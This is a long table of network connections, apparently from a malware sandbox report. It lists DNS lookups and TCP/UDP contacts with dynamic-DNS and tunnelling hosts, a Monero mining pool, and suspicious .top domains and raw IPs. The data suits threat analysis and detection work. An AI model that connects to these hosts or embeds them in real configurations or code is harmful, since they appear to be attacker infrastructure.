| US | 8.8.8.8:53 | 8.61.252.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| BG | 195.230.23.72:80 | tcp | |
| IR | 2.177.40.206:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 206.40.177.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| IR | 5.239.6.63:40500 | udp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 63.6.239.5.in-addr.arpa | udp |
| TH | 110.164.203.191:7000 | tcp | |
| RS | 79.101.0.33:443 | 79.101.0.33 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 33.0.101.79.in-addr.arpa | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 2.179.103.150:40500 | udp | |
| IR | 151.232.164.243:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 150.103.179.2.in-addr.arpa | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| KZ | 178.91.47.61:40500 | udp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 61.47.91.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.ip.gl.ply.gg | udp |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| KZ | 89.218.218.206:40500 | udp | |
| US | 8.8.8.8:53 | 206.218.218.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.138.45.170:17027 | 2.tcp.ngrok.io | tcp |
| IR | 89.37.171.228:40500 | udp | |
| US | 8.8.8.8:53 | 228.171.37.89.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| MX | 187.230.224.189:40500 | udp | |
| US | 8.8.8.8:53 | 189.224.230.187.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | 155.49.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 78.38.107.167:40500 | udp | |
| US | 8.8.8.8:53 | 167.107.38.78.in-addr.arpa | udp |
| IR | 5.219.236.227:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| RU | 5.139.95.144:40500 | udp | |
| US | 8.8.8.8:53 | 144.95.139.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 193.222.96.100:5555 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| US | 3.138.45.170:8808 | 2.tcp.ngrok.io | tcp |
| UZ | 213.230.69.230:40500 | udp | |
| US | 8.8.8.8:53 | 230.69.230.213.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| BG | 195.230.23.72:80 | tcp | |
| VE | 200.8.215.130:40500 | udp | |
| US | 8.8.8.8:53 | 130.215.8.200.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 93.188.86.253:40500 | udp | |
| US | 8.8.8.8:53 | 253.86.188.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| BE | 142.251.173.94:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| KZ | 94.141.226.56:40500 | udp | |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | 56.226.141.94.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 93.188.86.208:40500 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 185.123.69.190:40500 | udp | |
| US | 8.8.8.8:53 | 190.69.123.185.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| US | 20.83.148.22:80 | tcp | |
| UZ | 90.156.160.12:40500 | udp | |
| US | 8.8.8.8:53 | 12.160.156.90.in-addr.arpa | udp |
| IR | 5.235.185.18:40500 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| UZ | 90.156.160.25:40500 | udp | |
| US | 8.8.8.8:53 | 25.160.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| UZ | 90.156.166.42:40500 | udp | |
| US | 8.8.8.8:53 | 42.166.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| IR | 195.181.23.242:40500 | udp | |
| US | 8.8.8.8:53 | 242.23.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| CI | 160.155.209.135:40500 | udp | |
| US | 8.8.8.8:53 | 135.209.155.160.in-addr.arpa | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.128.107.74:8080 | 2.tcp.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| KZ | 37.151.27.190:40500 | udp | |
| US | 8.8.8.8:53 | 190.27.151.37.in-addr.arpa | udp |
| RU | 31.8.228.20:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 213.230.108.92:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 92.108.230.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| YE | 134.35.205.29:40500 | udp | |
| US | 8.8.8.8:53 | 29.205.35.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 213.230.127.60:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 60.127.230.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 62.113.117.95:4449 | tcp | |
| UZ | 87.237.234.159:40500 | udp | |
| US | 8.8.8.8:53 | 159.234.237.87.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| US | 3.128.107.74:8808 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| KG | 212.42.103.24:40500 | udp | |
| US | 8.8.8.8:53 | 24.103.42.212.in-addr.arpa | udp |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 78.36.17.105:40500 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.191.88.20:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 20.88.191.2.in-addr.arpa | udp |
| SY | 188.160.12.49:40500 | udp | |
| US | 8.8.8.8:53 | 49.12.160.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| YE | 46.35.80.190:40500 | udp | |
| US | 8.8.8.8:53 | 190.80.35.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.22.53.161:8080 | 2.tcp.ngrok.io | tcp |
| RU | 45.150.24.42:40500 | udp | |
| US | 8.8.8.8:53 | 42.24.150.45.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| US | 64.94.85.117:443 | tcp | |
| IR | 2.181.206.190:40500 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| SY | 77.44.131.125:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 125.131.44.77.in-addr.arpa | udp |
| RU | 78.37.229.249:40500 | udp | |
| US | 8.8.8.8:53 | 249.229.37.78.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| VE | 38.166.109.33:40500 | udp | |
| US | 8.8.8.8:53 | 33.109.166.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| MX | 187.230.142.108:40500 | udp | |
| N/A | 127.0.0.1:8808 | tcp | |
| US | 8.8.8.8:53 | 108.142.230.187.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| UZ | 213.230.97.138:40500 | udp | |
| KZ | 89.218.44.218:40500 | tcp | |
| US | 8.8.8.8:53 | 138.97.230.213.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 3.22.53.161:8080 | 2.tcp.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| SG | 35.185.187.24:80 | 35.185.187.24 | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 84.53.244.106:40500 | udp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | 24.187.185.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.244.53.84.in-addr.arpa | udp |
| RU | 31.163.71.248:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | 248.71.163.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 64.94.85.117:443 | tcp | |
| TR | 91.93.138.14:40500 | udp | |
| US | 8.8.8.8:53 | 14.138.93.91.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| AO | 102.215.170.62:40500 | udp | |
| US | 8.8.8.8:53 | 62.170.215.102.in-addr.arpa | udp |
| UZ | 213.230.91.87:40500 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.131.207.170:8080 | 2.tcp.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 2.191.14.149:40500 | udp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | 149.14.191.2.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 217.30.162.161:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 161.162.30.217.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| UZ | 213.230.69.54:40500 | udp | |
| US | 8.8.8.8:53 | 54.69.230.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| TJ | 185.177.0.227:40500 | udp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 227.0.177.185.in-addr.arpa | udp |
| IR | 2.176.94.43:40500 | udp | |
| US | 8.8.8.8:53 | 43.94.176.2.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| UZ | 90.156.166.83:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 3.131.207.170:8808 | 2.tcp.ngrok.io | tcp |
| MX | 189.133.187.71:40500 | udp | |
| US | 8.8.8.8:53 | 71.187.133.189.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 2.176.108.246:40500 | udp | |
| US | 8.8.8.8:53 | 246.108.176.2.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 5.234.67.61:40500 | udp | |
| US | 8.8.8.8:53 | 61.67.234.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | ns.smallsrv.com | udp |
| RU | 46.17.104.173:80 | ns.smallsrv.com | tcp |
| US | 8.8.8.8:53 | 173.104.17.46.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 176.113.115.163:80 | 176.113.115.163 | tcp |
| US | 20.83.148.22:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 163.115.113.176.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 8.8.8.8:53 | grupodulcemar.pe | udp |
| PE | 161.132.57.101:80 | grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| IL | 195.60.232.6:100 | 195.60.232.6 | tcp |
| US | 8.8.8.8:53 | sirault.be | udp |
| FR | 185.98.131.200:443 | sirault.be | tcp |
| US | 8.8.8.8:53 | 6.232.60.195.in-addr.arpa | udp |
| IR | 151.234.26.66:40500 | udp | |
| US | 8.8.8.8:53 | 200.131.98.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.26.234.151.in-addr.arpa | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| SY | 95.212.18.228:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| UZ | 185.203.239.94:40500 | udp | |
| US | 8.8.8.8:53 | 94.239.203.185.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 46.167.149.255:40500 | udp | |
| US | 8.8.8.8:53 | 255.149.167.46.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.138.45.170:8080 | 2.tcp.ngrok.io | tcp |
| KZ | 89.218.184.198:40500 | udp | |
| US | 8.8.8.8:53 | 198.184.218.89.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| MX | 189.167.57.71:40500 | udp | |
| US | 8.8.8.8:53 | 71.57.167.189.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| RU | 31.23.95.118:40500 | tcp | |
| KZ | 31.171.185.170:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 170.185.171.31.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.180.19.69:40500 | udp | |
| US | 8.8.8.8:53 | 69.19.180.2.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 2.181.218.207:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.189.31.47:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 47.31.189.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| IR | 85.185.237.83:40500 | udp | |
| US | 8.8.8.8:53 | 83.237.185.85.in-addr.arpa | udp |
| US | 3.138.45.170:8808 | 2.tcp.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| RO | 37.120.247.128:40500 | udp | |
| US | 8.8.8.8:53 | 128.247.120.37.in-addr.arpa | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| UZ | 217.30.160.219:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 219.160.30.217.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| UZ | 213.230.99.119:40500 | udp | |
| US | 8.8.8.8:53 | 119.99.230.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| KZ | 95.57.180.169:40500 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 193.222.96.100:5555 | tcp | |
| KZ | 178.88.234.149:40500 | udp | |
| US | 8.8.8.8:53 | 149.234.88.178.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| KZ | 92.47.143.122:40500 | udp | |
| US | 8.8.8.8:53 | 122.143.47.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| IR | 188.212.88.213:40500 | udp | |
| US | 8.8.8.8:53 | 18.ip.gl.ply.gg | udp |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 213.88.212.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.128.107.74:8080 | 2.tcp.ngrok.io | tcp |
| US | 104.219.239.11:6969 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| MX | 187.192.185.201:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 90.156.160.30:40500 | udp | |
| US | 8.8.8.8:53 | 30.160.156.90.in-addr.arpa | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| GB | 51.195.138.197:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 2.181.206.190:40500 | udp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | 197.138.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.206.181.2.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 38.224.37.24:40500 | udp | |
| US | 8.8.8.8:53 | 24.37.224.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| KZ | 95.59.171.222:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 222.171.59.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 151.247.243.189:40500 | udp | |
| US | 8.8.8.8:53 | 189.243.247.151.in-addr.arpa | udp |
| US | 3.128.107.74:8080 | 2.tcp.ngrok.io | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| IR | 93.118.127.143:40500 | udp | |
| MX | 189.173.142.192:40500 | tcp | |
| US | 8.8.8.8:53 | 143.127.118.93.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 185.123.69.47:40500 | udp | |
| US | 8.8.8.8:53 | 47.69.123.185.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| GB | 51.195.138.197:10343 | xmr-eu2.nanopool.org | tcp |
| RU | 188.124.116.191:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 191.116.124.188.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| KZ | 178.91.130.114:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 114.130.91.178.in-addr.arpa | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| GB | 51.195.138.197:10343 | xmr-eu2.nanopool.org | tcp |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | yyyson22.gleeze.com | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 185.254.96.230:4608 | yyyson22.gleeze.com | tcp |
| US | 8.8.8.8:53 | 230.96.254.185.in-addr.arpa | udp |
| IR | 5.236.121.2:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 2.121.236.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 3.128.107.74:17027 | 2.tcp.ngrok.io | tcp |
| PL | 51.68.137.186:10343 | xmr-eu2.nanopool.org | tcp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| DE | 185.254.96.230:4608 | yyyson22.gleeze.com | tcp |
| US | 8.8.8.8:53 | 186.137.68.51.in-addr.arpa | udp |
| RU | 91.122.218.118:40500 | udp | |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | storage.soowim.co.kr | udp |
| US | 8.8.8.8:53 | 118.218.122.91.in-addr.arpa | udp |
| KR | 210.216.165.152:80 | storage.soowim.co.kr | tcp |
| IR | 151.232.179.149:40500 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| CN | 47.98.177.117:8888 | tcp | |
| US | 8.8.8.8:53 | 152.165.216.210.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| NL | 89.105.223.196:29862 | tcp | |
| KR | 211.168.94.177:3389 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| N/A | 127.0.0.1:51474 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| RU | 62.113.117.95:4449 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| N/A | 127.0.0.1:51490 | tcp | |
| N/A | 127.0.0.1:51493 | tcp | |
| N/A | 127.0.0.1:51495 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 18.ip.gl.ply.gg | udp |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| DZ | 105.103.151.212:40500 | udp | |
| US | 8.8.8.8:53 | 212.151.103.105.in-addr.arpa | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| US | 104.219.239.11:6969 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 163.172.171.111:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| IR | 151.242.48.19:40500 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| CN | 110.40.51.56:5700 | tcp | |
